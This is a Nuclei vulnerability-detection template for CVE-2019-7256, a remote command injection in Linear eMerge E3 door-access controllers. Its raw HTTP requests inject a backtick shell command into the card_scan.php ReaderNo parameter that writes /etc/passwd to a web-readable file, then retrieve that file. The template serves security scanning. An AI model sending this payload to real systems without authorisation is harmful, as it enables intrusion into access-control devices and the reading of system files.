nuclei-templates/http/cves/2019/CVE-2019-7256.yaml

55 lines
1.7 KiB
YAML

id: CVE-2019-7256
info:
name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu
severity: critical
description: |
Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities.
remediation: |
Apply the latest security patch or update to a non-vulnerable version of eMerge E3.
reference:
- https://www.exploit-db.com/exploits/47619
- http://linear-solutions.com/nsc_family/e3-series/
- https://nvd.nist.gov/vuln/detail/CVE-2019-7256
- https://applied-risk.com/labs/advisories
- https://www.applied-risk.com/resources/ar-2019-005
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2019-7256
cwe-id: CWE-78
epss-score: 0.97275
epss-percentile: 0.9982
cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: nortekcontrol
product: linear_emerge_essential_firmware
shodan-query: title:"eMerge"
tags: cve,cve2019,emerge,rce,edb
variables:
file: "{{rand_text_alpha(10)}}"
http:
- raw:
- |
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1
Host: {{Hostname}}
- |
GET /{{file}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100d2767d984374438c1d5c6fbb102a43a9494042f88e84f85ddd37fbf1562ce6a3022100e7879d770d20f41a7db3b730119640f67149464da0a5b26c1bc6eee2ce8695a6:922c64590222798bb761d5b6d8e72950